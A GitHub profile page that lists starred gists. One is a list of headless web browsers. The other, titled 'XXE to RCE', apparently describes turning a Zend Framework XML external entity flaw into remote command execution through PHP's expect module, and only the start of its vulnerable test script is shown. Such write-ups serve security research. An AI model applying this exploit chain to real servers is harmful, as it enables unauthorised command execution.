Skip to content

Instantly share code, notes, and snippets.

View th3gundy's full-sized avatar

Yunus YILDIRIM th3gundy

111 followers · 66 following
View GitHub Profile
@evandrix
evandrix / README.md
Created September 11, 2012 00:06
Headless web browsers

Here are a list of headless browsers that I know about:

  • [HtmlUnit][1] - Java. Custom browser engine. JavaScript support/DOM emulated. Open source.
  • [Ghost][2] - Python only. WebKit-based. Full JavaScript support. Open source.
  • [Twill][3] - Python/command line. Custom browser engine. No JavaScript. Open source.
  • [PhantomJS][4] - Command line/all platforms. WebKit-based. Full JavaScript support. Open source.
  • [Awesomium][5] - C++/.Net/all platforms. Chromium-based. Full JavaScript support. Commercial/free.
  • [SimpleBrowser][6] - .Net 4/C#. Custom browser engine. No JavaScript support. Open source.
  • [ZombieJS][7] - Node.js. Custom browser engine. JavaScript support/emulated DOM. Open source.
  • [EnvJS][8] - JavaScript via Java/Rhino. Custom browser engine. JavaScript support/emulated DOM. Open source.
@joernchen
joernchen / gist:3623896
Created September 4, 2012 17:34
XXE to RCE
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
into a Remote Command Execution:
NOTE: It relies on the PHP expect module being loaded
(see http://de.php.net/manual/en/book.expect.php)
joern@vbox-1:/tmp$ cat /var/www/server.php
<?
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();